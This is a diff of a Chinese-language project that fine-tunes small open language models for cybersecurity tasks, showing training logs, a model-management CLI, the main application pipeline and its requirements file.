+2025-07-18 01:08:08 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 377.7GB
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 13.4GB
+2025-07-18 01:08:09 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练

+ 2 - 0
logs/training_20250718_010838.log

@@ -0,0 +1,2 @@
+/qwen/venv/lib/python3.10/site-packages/transformers/utils/hub.py:111: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
+  warnings.warn(

+ 38 - 0
logs/training_20250718_011032.log

@@ -0,0 +1,38 @@
+/qwen/venv/lib/python3.10/site-packages/transformers/utils/hub.py:111: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
+  warnings.warn(
+2025-07-18 01:10:37 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_011037.log
+2025-07-18 01:10:37 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 01:10:37 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+
+=== 模型选择 ===
+可用的模型:
+  1. qwen2.5-1.5b-instruct: Qwen2.5-1.5B-Instruct (qwen2)
+  2. qwen2-1.5b-instruct: Qwen2-1.5B-Instruct (qwen2)
+  3. qwen2-7b-instruct: Qwen2-7B-Instruct (qwen2)
+  4. chatglm3-6b: ChatGLM3-6B (chatglm)
+  5. baichuan2-7b-chat: Baichuan2-7B-Chat (baichuan)
+  6. llama2-7b-chat: Llama2-7B-Chat (llama)
+
+默认模型: Qwen2.5-1.5B-Instruct (qwen2.5-1.5b-instruct)
+请选择模型 (输入数字编号,或直接回车使用默认模型):
+> 2025-07-18 01:10:39 - SecurityModelApp - INFO - 开始完整训练流程...
+2025-07-18 01:10:39 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 377.7GB
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 13.3GB
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 开始数据准备...
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 发现已处理的数据,跳过数据下载和处理
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-18 01:10:49 - TrainingMonitor - INFO - 开始训练监控
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 设置模型...
+2025-07-18 01:10:49 - ModelDownloader - INFO - 开始下载模型: qwen2.5-1.5b-instruct
+2025-07-18 01:10:49 - ModelDownloader - INFO - 使用git clone从ModelScope下载: https://www.modelscope.cn/qwen/Qwen2.5-1.5B-Instruct.git

+ 24 - 0
logs/training_20250718_011037.log

@@ -0,0 +1,24 @@
+2025-07-18 01:10:37 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_011037.log
+2025-07-18 01:10:37 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 01:10:37 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-18 01:10:39 - SecurityModelApp - INFO - 开始完整训练流程...
+2025-07-18 01:10:39 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 377.7GB
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 13.3GB
+2025-07-18 01:10:39 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-18 01:10:49 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 开始数据准备...
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 发现已处理的数据,跳过数据下载和处理
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-18 01:10:49 - TrainingMonitor - INFO - 开始训练监控
+2025-07-18 01:10:49 - SecurityModelApp - INFO - 设置模型...
+2025-07-18 01:10:49 - ModelDownloader - INFO - 开始下载模型: qwen2.5-1.5b-instruct
+2025-07-18 01:10:49 - ModelDownloader - INFO - 使用git clone从ModelScope下载: https://www.modelscope.cn/qwen/Qwen2.5-1.5B-Instruct.git

+ 21 - 0
main.py

@@ -0,0 +1,21 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+网络安全模型训练系统 - 主入口
+
+这是重构后的主入口文件,使用模块化架构。
+"""
+
+import sys
+from pathlib import Path
+
+# 添加src目录到Python路径
+src_path = Path(__file__).parent / "src"
+sys.path.insert(0, str(src_path))
+
+from src.app import main
+
+
+
+if __name__ == "__main__":
+    main()

+ 38 - 0
requirements.txt

@@ -0,0 +1,38 @@
+# 核心深度学习框架(必须按顺序安装)
+torch>=2.0.0
+transformers>=4.30.0
+datasets>=2.12.0
+peft>=0.4.0
+bitsandbytes>=0.39.0
+accelerate>=0.20.0
+
+# Hugging Face生态系统(必需)
+huggingface_hub>=0.16.0
+safetensors>=0.3.0
+
+# 分词器和模型支持(必需)
+sentencepiece>=0.1.99
+tokenizers>=0.13.0
+protobuf>=3.20.0
+# flash-attn>=2.0.0  # 可选:需要CUDA和较长编译时间,如需要请手动安装
+
+# 数据处理和网络请求(必需)
+requests>=2.31.0
+beautifulsoup4>=4.11.0
+numpy>=1.21.0
+pandas>=1.5.0
+tqdm>=4.65.0
+jieba>=0.42.1
+
+# 模型源支持(必需)
+modelscope>=1.9.0
+
+# 系统监控和环境检查(必需)
+psutil>=5.9.0
+nvidia-ml-py>=12.535.108
+
+# 可选依赖(实验跟踪和可视化,可根据需要安装)
+# wandb>=0.15.0
+# tensorboard>=2.10.0
+# matplotlib>=3.5.0
+# seaborn>=0.11.0

+ 366 - 0
scripts/model_manager.py

@@ -0,0 +1,366 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+模型管理CLI工具
+
+提供命令行界面来管理多个模型,包括列出、下载、切换和测试模型。
+
+使用方法:
+    python scripts/model_manager.py list                    # 列出所有可用模型
+    python scripts/model_manager.py download <model_key>    # 下载指定模型
+    python scripts/model_manager.py switch <model_key>      # 切换当前模型
+    python scripts/model_manager.py current                 # 显示当前模型
+    python scripts/model_manager.py test <model_key>        # 测试模型推理
+    python scripts/model_manager.py chat <model_key>        # 与模型对话
+    python scripts/model_manager.py info <model_key>        # 显示模型详细信息
+"""
+
+import argparse
+import sys
+from pathlib import Path
+from typing import Optional
+
+# 添加项目根目录到Python路径
+project_root = Path(__file__).parent.parent
+sys.path.insert(0, str(project_root))
+
+from src.config.settings import Config
+from src.config.model_configs import ModelRegistry
+from src.model.inference import SecurityModelInference
+from src.model.downloader import ModelDownloader
+from src.utils.logger import get_logger
+
+logger = get_logger(__name__)
+
+class ModelManager:
+    """模型管理器"""
+    
+    def __init__(self):
+        self.config = Config()
+        self.registry = ModelRegistry()
+    
+    def list_models(self):
+        """列出所有可用模型"""
+        models = self.registry.list_models()
+        
+        print("\n=== 可用模型列表 ===")
+        print(f"{'模型键':<20} {'名称':<30} {'架构':<15} {'状态':<10}")
+        print("-" * 80)
+        
+        current_model = self.config.get_current_model_key()
+        
+        for model_key, model_config in models.items():
+            # 检查模型是否已下载
+            self.config.set_current_model(model_key)
+            model_path = Path(self.config.get_model_path())
+            status = "已下载" if model_path.exists() and any(model_path.iterdir()) else "未下载"
+            
+            # 标记当前模型
+            marker = "*" if model_key == current_model else " "
+            
+            print(f"{marker}{model_key:<19} {model_config.name:<30} {model_config.architecture:<15} {status:<10}")
+        
+        print(f"\n当前模型: {current_model}")
+        print("注: * 表示当前选中的模型")
+    
+    def download_model(self, model_key: str):
+        """下载指定模型"""
+        if model_key not in self.registry.list_models():
+            print(f"错误: 未知的模型键 '{model_key}'")
+            self.list_available_keys()
+            return False
+        
+        try:
+            print(f"\n开始下载模型: {model_key}")
+            
+            downloader = ModelDownloader(self.config, model_key=model_key)
+            model_path = downloader.ensure_model_downloaded()
+            
+            print(f"模型下载成功: {model_path}")
+            return True
+            
+        except Exception as e:
+            print(f"模型下载失败: {e}")
+            logger.error(f"下载模型 {model_key} 失败", exc_info=True)
+            return False
+    
+    def switch_model(self, model_key: str):
+        """切换当前模型"""
+        if model_key not in self.registry.list_models():
+            print(f"错误: 未知的模型键 '{model_key}'")
+            self.list_available_keys()
+            return False
+        
+        try:
+            old_model = self.config.get_current_model_key()
+            self.config.set_current_model(model_key)
+            
+            print(f"模型切换成功: {old_model} -> {model_key}")
+            return True
+            
+        except Exception as e:
+            print(f"模型切换失败: {e}")
+            logger.error(f"切换到模型 {model_key} 失败", exc_info=True)
+            return False
+    
+    def show_current(self):
+        """显示当前模型信息"""
+        current_key = self.config.get_current_model_key()
+        current_config = self.config.get_current_model_config()
+        
+        print(f"\n=== 当前模型信息 ===")
+        print(f"模型键: {current_key}")
+        print(f"名称: {current_config.name}")
+        print(f"架构: {current_config.architecture}")
+        print(f"最大长度: {current_config.max_length}")
+        print(f"本地路径: {self.config.get_model_path()}")
+        
+        # 检查模型状态
+        model_path = Path(self.config.get_model_path())
+        if model_path.exists() and any(model_path.iterdir()):
+            print(f"状态: 已下载")
+        else:
+            print(f"状态: 未下载")
+    
+    def show_model_info(self, model_key: str):
+        """显示指定模型的详细信息"""
+        if model_key not in self.registry.list_models():
+            print(f"错误: 未知的模型键 '{model_key}'")
+            self.list_available_keys()
+            return False
+        
+        model_config = self.registry.get_model_config(model_key)
+        
+        print(f"\n=== 模型信息: {model_key} ===")
+        print(f"名称: {model_config.name}")
+        print(f"架构: {model_config.architecture}")
+        print(f"最大长度: {model_config.max_length}")
+        print(f"支持Chat模板: {model_config.supports_chat_template}")
+        print(f"支持量化: {model_config.supports_quantization}")
+        print(f"支持LoRA: {model_config.supports_lora}")
+        
+        # 下载信息
+        self.config.set_current_model(model_key)
+        modelscope_id = self.config.get_model_id_for_download('modelscope')
+        huggingface_id = self.config.get_model_id_for_download('huggingface')
+        
+        print(f"\n下载信息:")
+        print(f"  ModelScope: {modelscope_id or '不支持'}")
+        print(f"  HuggingFace: {huggingface_id or '不支持'}")
+        print(f"  本地路径: {self.config.get_model_path()}")
+        
+        # 检查状态
+        model_path = Path(self.config.get_model_path())
+        if model_path.exists() and any(model_path.iterdir()):
+            print(f"  状态: 已下载")
+        else:
+            print(f"  状态: 未下载")
+        
+        # 特殊配置
+        if model_config.special_tokens:
+            print(f"\n特殊Token: {model_config.special_tokens}")
+        
+        if model_config.lora_target_modules:
+            print(f"LoRA目标模块: {model_config.lora_target_modules}")
+        
+        if model_config.generation_config:
+            print(f"生成配置: {model_config.generation_config}")
+        
+        return True
+    
+    def test_model(self, model_key: str):
+        """测试模型推理"""
+        if model_key not in self.registry.list_models():
+            print(f"错误: 未知的模型键 '{model_key}'")
+            self.list_available_keys()
+            return False
+        
+        try:
+            print(f"\n测试模型: {model_key}")
+            
+            # 检查模型是否已下载
+            self.config.set_current_model(model_key)
+            model_path = Path(self.config.get_model_path())
+            
+            if not model_path.exists() or not any(model_path.iterdir()):
+                print(f"模型未下载,请先下载: python {sys.argv[0]} download {model_key}")
+                return False
+            
+            # 创建推理实例
+            inference = SecurityModelInference(self.config, model_key=model_key)
+            inference.load_model(model_key=model_key)
+            
+            # 测试对话
+            test_message = "请简单介绍一下你自己"
+            print(f"\n测试问题: {test_message}")
+            print("生成回复中...")
+            
+            response, _ = inference.chat(test_message)
+            
+            print(f"\n模型回复: {response}")
+            print(f"\n测试完成!模型 {model_key} 工作正常。")
+            return True
+            
+        except Exception as e:
+            print(f"模型测试失败: {e}")
+            logger.error(f"测试模型 {model_key} 失败", exc_info=True)
+            return False
+    
+    def chat_with_model(self, model_key: str):
+        """与模型进行交互式对话"""
+        if model_key not in self.registry.list_models():
+            print(f"错误: 未知的模型键 '{model_key}'")
+            self.list_available_keys()
+            return False
+        
+        try:
+            print(f"\n启动与模型 {model_key} 的对话")
+            
+            # 检查模型是否已下载
+            self.config.set_current_model(model_key)
+            model_path = Path(self.config.get_model_path())
+            
+            if not model_path.exists() or not any(model_path.iterdir()):
+                print(f"模型未下载,请先下载: python {sys.argv[0]} download {model_key}")
+                return False
+            
+            # 创建推理实例
+            print("加载模型中...")
+            inference = SecurityModelInference(self.config, model_key=model_key)
+            inference.load_model(model_key=model_key)
+            
+            print("模型加载完成!")
+            print("输入 'quit' 或 'exit' 退出对话")
+            print("-" * 50)
+            
+            history = []
+            
+            while True:
+                try:
+                    user_input = input("\n用户: ").strip()
+                    
+                    if user_input.lower() in ['quit', 'exit', '退出']:
+                        print("对话结束")
+                        break
+                    
+                    if not user_input:
+                        continue
+                    
+                    print("助手: ", end="", flush=True)
+                    response, history = inference.chat(user_input, history)
+                    print(response)
+                    
+                except KeyboardInterrupt:
+                    print("\n\n对话被中断")
+                    break
+                except Exception as e:
+                    print(f"\n对话出错: {e}")
+                    continue
+            
+            return True
+            
+        except Exception as e:
+            print(f"启动对话失败: {e}")
+            logger.error(f"与模型 {model_key} 对话失败", exc_info=True)
+            return False
+    
+    def list_available_keys(self):
+        """列出可用的模型键"""
+        models = self.registry.list_models()
+        print(f"\n可用的模型键: {', '.join(models.keys())}")
+
+def main():
+    """主函数"""
+    parser = argparse.ArgumentParser(
+        description="神机模型管理工具",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+示例:
+  %(prog)s list                    # 列出所有模型
+  %(prog)s download qwen2.5-1.5b  # 下载Qwen模型
+  %(prog)s switch chatglm3-6b     # 切换到ChatGLM模型
+  %(prog)s current                 # 显示当前模型
+  %(prog)s test qwen2.5-1.5b       # 测试模型
+  %(prog)s chat qwen2.5-1.5b       # 与模型对话
+  %(prog)s info baichuan2-7b       # 显示模型信息
+        """
+    )
+    
+    subparsers = parser.add_subparsers(dest='command', help='可用命令')
+    
+    # list命令
+    subparsers.add_parser('list', help='列出所有可用模型')
+    
+    # download命令
+    download_parser = subparsers.add_parser('download', help='下载指定模型')
+    download_parser.add_argument('model_key', help='模型键')
+    
+    # switch命令
+    switch_parser = subparsers.add_parser('switch', help='切换当前模型')
+    switch_parser.add_argument('model_key', help='模型键')
+    
+    # current命令
+    subparsers.add_parser('current', help='显示当前模型信息')
+    
+    # test命令
+    test_parser = subparsers.add_parser('test', help='测试模型推理')
+    test_parser.add_argument('model_key', help='模型键')
+    
+    # chat命令
+    chat_parser = subparsers.add_parser('chat', help='与模型进行交互式对话')
+    chat_parser.add_argument('model_key', help='模型键')
+    
+    # info命令
+    info_parser = subparsers.add_parser('info', help='显示模型详细信息')
+    info_parser.add_argument('model_key', help='模型键')
+    
+    args = parser.parse_args()
+    
+    if not args.command:
+        parser.print_help()
+        return
+    
+    manager = ModelManager()
+    
+    try:
+        if args.command == 'list':
+            manager.list_models()
+        
+        elif args.command == 'download':
+            success = manager.download_model(args.model_key)
+            sys.exit(0 if success else 1)
+        
+        elif args.command == 'switch':
+            success = manager.switch_model(args.model_key)
+            sys.exit(0 if success else 1)
+        
+        elif args.command == 'current':
+            manager.show_current()
+        
+        elif args.command == 'test':
+            success = manager.test_model(args.model_key)
+            sys.exit(0 if success else 1)
+        
+        elif args.command == 'chat':
+            success = manager.chat_with_model(args.model_key)
+            sys.exit(0 if success else 1)
+        
+        elif args.command == 'info':
+            success = manager.show_model_info(args.model_key)
+            sys.exit(0 if success else 1)
+        
+        else:
+            print(f"未知命令: {args.command}")
+            parser.print_help()
+            sys.exit(1)
+    
+    except KeyboardInterrupt:
+        print("\n操作被中断")
+        sys.exit(1)
+    except Exception as e:
+        print(f"执行失败: {e}")
+        logger.error("命令执行失败", exc_info=True)
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()

+ 11 - 0
src/__init__.py

@@ -0,0 +1,11 @@
+# -*- coding: utf-8 -*-
+"""
+网络安全模型自动化训练系统
+
+一个专为网络安全场景设计的自动化模型训练系统,基于Qwen2-1.5B,
+适配小显存环境,具备代码生成和网络安全分析能力。
+"""
+
+__version__ = "1.0.0"
+__author__ = "Security AI Team"
+__description__ = "Automated Security Model Training System"

BIN
src/__pycache__/__init__.cpython-310.pyc


BIN
src/__pycache__/app.cpython-310.pyc


+ 398 - 0
src/app.py

@@ -0,0 +1,398 @@
+# -*- coding: utf-8 -*-
+"""
+主应用程序模块
+
+整合所有功能模块,提供统一的训练接口。
+"""
+
+import argparse
+import sys
+from pathlib import Path
+from typing import Optional
+
+from .config import Config, TrainingConfig, DataConfig
+from .data import DataDownloader, DataProcessor, DataLoader
+from .model import ModelDownloader, SecurityModelTrainer, SecurityModelInference
+from .utils import setup_logging, get_logger, EnvironmentChecker, TrainingMonitor
+
+
+def get_user_model_choice():
+    """获取用户的模型选择"""
+    from .config.model_configs import ModelRegistry
+    
+    print("\n=== 模型选择 ===")
+    print("可用的模型:")
+    
+    # 显示可用模型列表
+    registry = ModelRegistry()
+    models = registry.list_models()  # 返回 {key: name} 格式
+    model_list = list(models.keys())
+    
+    for i, (model_key, model_name) in enumerate(models.items(), 1):
+        # 获取完整配置以显示架构信息
+        config = registry.get_model_config(model_key)
+        print(f"  {i}. {model_key}: {model_name} ({config.architecture})")
+    
+    print(f"\n默认模型: Qwen2.5-1.5B-Instruct (qwen2.5-1.5b-instruct)")
+    print("请选择模型 (输入数字编号,或直接回车使用默认模型):")
+    
+    try:
+        user_input = input("> ").strip()
+        
+        if not user_input:  # 用户直接回车,使用默认模型
+            return "qwen2.5-1.5b-instruct"
+        
+        # 尝试解析为数字
+        try:
+            choice_num = int(user_input)
+            if 1 <= choice_num <= len(model_list):
+                selected_key = model_list[choice_num - 1]
+                print(f"已选择: {selected_key}")
+                return selected_key
+            else:
+                print(f"无效的选择编号,使用默认模型")
+                return "qwen2.5-1.5b-instruct"
+        except ValueError:
+            # 尝试直接匹配模型键
+            if user_input in models:
+                print(f"已选择: {user_input}")
+                return user_input
+            else:
+                print(f"未找到模型 '{user_input}',使用默认模型")
+                return "qwen2.5-1.5b-instruct"
+                
+    except KeyboardInterrupt:
+        print("\n用户取消,使用默认模型")
+        return "qwen2.5-1.5b-instruct"
+    except Exception as e:
+        print(f"输入错误: {e},使用默认模型")
+        return "qwen2.5-1.5b-instruct"
+
+
+class SecurityModelApp:
+    """网络安全模型应用程序"""
+    
+    def __init__(self, config_path: Optional[str] = None):
+        # 初始化配置
+        self.config = Config()
+        self.training_config = TrainingConfig()
+        self.data_config = DataConfig()
+        
+        # 设置环境
+        self.config.setup_environment()
+        self.config.create_directories()
+        
+        # 设置日志
+        setup_logging(self.config.LOGS_DIR)
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 初始化组件
+        self.env_checker = EnvironmentChecker()
+        self.data_downloader = DataDownloader(self.config, self.data_config)
+        self.data_processor = DataProcessor(self.config, self.data_config)
+        self.data_loader = DataLoader(self.config, self.data_config)
+        self.model_downloader = ModelDownloader(self.config)
+        self.trainer = SecurityModelTrainer(self.config, self.training_config)
+        self.monitor = TrainingMonitor(self.config.LOGS_DIR)
+        
+        self.logger.info("网络安全模型应用程序已初始化")
+    
+    def check_environment(self) -> bool:
+        """检查环境"""
+        self.logger.info("开始环境检查...")
+        
+        results = self.env_checker.check_all()
+        
+        # 检查关键项目
+        critical_checks = ["python_version", "required_packages"]
+        critical_failed = any(
+            not results.get(check, {}).get("status", False)
+            for check in critical_checks
+        )
+        
+        if critical_failed:
+            self.logger.error("关键环境检查失败,无法继续")
+            recommendations = self.env_checker.get_recommendations()
+            for rec in recommendations:
+                self.logger.info(f"建议: {rec}")
+            return False
+        
+        # 警告非关键项目
+        non_critical_failed = [
+            check for check, result in results.items()
+            if check not in critical_checks and not result.get("status", False)
+        ]
+        
+        if non_critical_failed:
+            self.logger.warning(f"非关键检查失败: {', '.join(non_critical_failed)}")
+            self.logger.warning("训练可能受到影响,但可以继续")
+        
+        return True
+    
+    def prepare_data(self, force_download: bool = False) -> bool:
+        """准备训练数据"""
+        try:
+            self.logger.info("开始数据准备...")
+            
+            # 检查是否已有处理后的数据
+            processed_data_file = self.config.DATA_DIR / "processed" / "training_data.json"
+            
+            if processed_data_file.exists() and not force_download:
+                self.logger.info("发现已处理的数据,跳过数据下载和处理")
+                return True
+            
+            # 下载数据
+            self.logger.info("下载训练数据...")
+            raw_data = self.data_downloader.download_all_data()
+            
+            if not raw_data:
+                self.logger.error("数据下载失败")
+                return False
+            
+            # 处理数据
+            self.logger.info("处理训练数据...")
+            clean_path, training_path = self.data_processor.process_and_save(raw_data)
+            
+            self.logger.info(f"数据处理完成: {training_path}")
+            
+            # 显示数据统计
+            data_info = self.data_loader.get_data_info()
+            self.logger.info(f"数据统计: {data_info}")
+            
+            return True
+            
+        except Exception as e:
+            self.logger.error(f"数据准备失败: {e}")
+            return False
+    
+    def train_model(self, resume_from_checkpoint: bool = False, checkpoint_path: Optional[str] = None) -> bool:
+        """训练模型"""
+        try:
+            if resume_from_checkpoint:
+                if checkpoint_path:
+                    self.logger.info(f"从指定checkpoint继续训练: {checkpoint_path}")
+                else:
+                    self.logger.info("从最新checkpoint继续训练")
+            else:
+                self.logger.info("开始新的模型训练...")
+            
+            # 开始监控
+            self.monitor.start_monitoring()
+            
+            # 设置模型
+            self.logger.info("设置模型...")
+            self.trainer.setup_model()
+            
+            # 准备训练
+            self.logger.info("准备训练数据...")
+            self.trainer.prepare_training()
+            
+            # 显示训练信息
+            training_info = self.trainer.get_training_info()
+            self.logger.info(f"训练配置: {training_info}")
+            
+            # 开始训练(支持从checkpoint恢复)
+            if resume_from_checkpoint:
+                self.logger.info("开始恢复训练...")
+                self.trainer.train(resume_from_checkpoint=checkpoint_path)
+            else:
+                self.logger.info("开始训练...")
+                self.trainer.train()
+            
+            # 评估模型
+            self.logger.info("评估模型...")
+            eval_results = self.trainer.evaluate()
+            self.logger.info(f"评估结果: {eval_results}")
+            
+            # 保存模型
+            self.logger.info("保存模型...")
+            model_path = self.trainer.save_model()
+            self.logger.info(f"模型已保存到: {model_path}")
+            
+            # 测试模型
+            self.logger.info("测试模型...")
+            test_results = self.trainer.test_model()
+            for result in test_results:
+                self.logger.info(f"测试 - 问题: {result['prompt']}")
+                self.logger.info(f"测试 - 回答: {result['response']}")
+            
+            # 停止监控并生成报告
+            self.monitor.stop_monitoring()
+            report_path = self.monitor.save_report()
+            self.logger.info(f"训练报告已保存: {report_path}")
+            
+            self.logger.info("模型训练完成!")
+            return True
+            
+        except Exception as e:
+            self.logger.error(f"模型训练失败: {e}")
+            self.monitor.stop_monitoring()
+            return False
+    
+    def test_model(self, model_path: Optional[str] = None) -> bool:
+        """测试模型"""
+        try:
+            self.logger.info("开始模型测试...")
+            
+            # 创建推理器
+            inference = SecurityModelInference(self.config)
+            
+            # 加载模型
+            if model_path:
+                inference.load_model(model_path)
+            else:
+                # 使用默认输出路径
+                default_path = self.config.OUTPUT_DIR / "final_model"
+                if default_path.exists():
+                    inference.load_model(str(default_path))
+                else:
+                    self.logger.error("未找到训练好的模型")
+                    return False
+            
+            # 显示模型信息
+            model_info = inference.get_model_info()
+            self.logger.info(f"模型信息: {model_info}")
+            
+            # 运行安全功能演示
+            self.logger.info("运行网络安全功能演示...")
+            demo_results = inference.security_demo()
+            
+            self.logger.info("模型测试完成")
+            return True
+            
+        except Exception as e:
+            self.logger.error(f"模型测试失败: {e}")
+            return False
+    
+    def interactive_mode(self, model_path: Optional[str] = None) -> None:
+        """交互模式"""
+        try:
+            self.logger.info("启动交互模式...")
+            
+            # 创建推理器
+            inference = SecurityModelInference(self.config)
+            
+            # 加载模型
+            if model_path:
+                inference.load_model(model_path)
+            else:
+                default_path = self.config.OUTPUT_DIR / "final_model"
+                if default_path.exists():
+                    inference.load_model(str(default_path))
+                else:
+                    self.logger.error("未找到训练好的模型")
+                    return
+            
+            # 开始交互
+            inference.interactive_chat()
+            
+        except Exception as e:
+            self.logger.error(f"交互模式失败: {e}")
+    
+    def run_full_pipeline(self, force_data_download: bool = False, resume_from_checkpoint: bool = False, checkpoint_path: Optional[str] = None) -> bool:
+        """运行完整流程"""
+        self.logger.info("开始完整训练流程...")
+        
+        # 1. 环境检查
+        if not self.check_environment():
+            return False
+        
+        # 2. 数据准备
+        if not self.prepare_data(force_data_download):
+            return False
+        
+        # 3. 模型训练
+        if not self.train_model(resume_from_checkpoint, checkpoint_path):
+            return False
+        
+        # 4. 模型测试
+        if not self.test_model():
+            return False
+        
+        self.logger.info("完整训练流程成功完成!")
+        return True
+
+
+def main():
+    """主函数"""
+    parser = argparse.ArgumentParser(description="网络安全模型训练系统")
+    parser.add_argument("--mode", choices=["full", "data", "train", "test", "interactive", "check"],
+                       default="full", help="运行模式")
+    parser.add_argument("--model-path", type=str, help="模型路径(用于测试和交互模式)")
+    parser.add_argument("--force-download", action="store_true", help="强制重新下载数据")
+    parser.add_argument("--config", type=str, help="配置文件路径")
+    
+    # 继续训练选项
+    parser.add_argument("--resume", action="store_true", help="从最新checkpoint继续训练")
+    parser.add_argument("--resume-from", type=str, help="从指定checkpoint路径继续训练")
+    
+    # 模型选择选项
+    parser.add_argument("--model", type=str, help="选择基础模型 (qwen, chatglm, baichuan, llama等)")
+    parser.add_argument("--list-models", action="store_true", help="列出支持的模型")
+    
+    args = parser.parse_args()
+    
+    try:
+        # 处理列出模型选项
+        if args.list_models:
+            from .config.model_configs import ModelRegistry
+            registry = ModelRegistry()
+            models = registry.list_models()
+            print("支持的模型:")
+            for model_key, config in models.items():
+                print(f"  {model_key}: {config.name} ({config.architecture})")
+            return
+        
+        # 创建应用程序
+        app = SecurityModelApp(args.config)
+        
+        # 设置模型(如果指定)
+        if args.model:
+            from .config.settings import Config
+            try:
+                Config.set_current_model(args.model)
+                print(f"已切换到模型: {args.model}")
+            except ValueError as e:
+                print(f"模型设置失败: {e}")
+                sys.exit(1)
+        else:
+            # 如果没有指定模型,提供交互式选择
+            model_key = get_user_model_choice()
+            from .config.settings import Config
+            Config.set_current_model(model_key)
+        
+        # 处理继续训练选项
+        resume_from_checkpoint = args.resume or args.resume_from
+        checkpoint_path = args.resume_from if args.resume_from else None
+        
+        # 根据模式执行相应操作
+        if args.mode == "check":
+            success = app.check_environment()
+        elif args.mode == "data":
+            success = app.prepare_data(args.force_download)
+        elif args.mode == "train":
+            success = app.train_model(resume_from_checkpoint, checkpoint_path)
+        elif args.mode == "test":
+            success = app.test_model(args.model_path)
+        elif args.mode == "interactive":
+            app.interactive_mode(args.model_path)
+            success = True
+        elif args.mode == "full":
+            success = app.run_full_pipeline(args.force_download, resume_from_checkpoint, checkpoint_path)
+        else:
+            print(f"未知模式: {args.mode}")
+            success = False
+        
+        if not success:
+            sys.exit(1)
+            
+    except KeyboardInterrupt:
+        print("\n用户中断操作")
+        sys.exit(1)
+    except Exception as e:
+        print(f"程序执行失败: {e}")
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

+ 12 - 0
src/config/__init__.py

@@ -0,0 +1,12 @@
+# -*- coding: utf-8 -*-
+"""
+配置管理模块
+
+统一管理系统配置、训练参数、数据源等配置信息。
+"""
+
+from .settings import Config
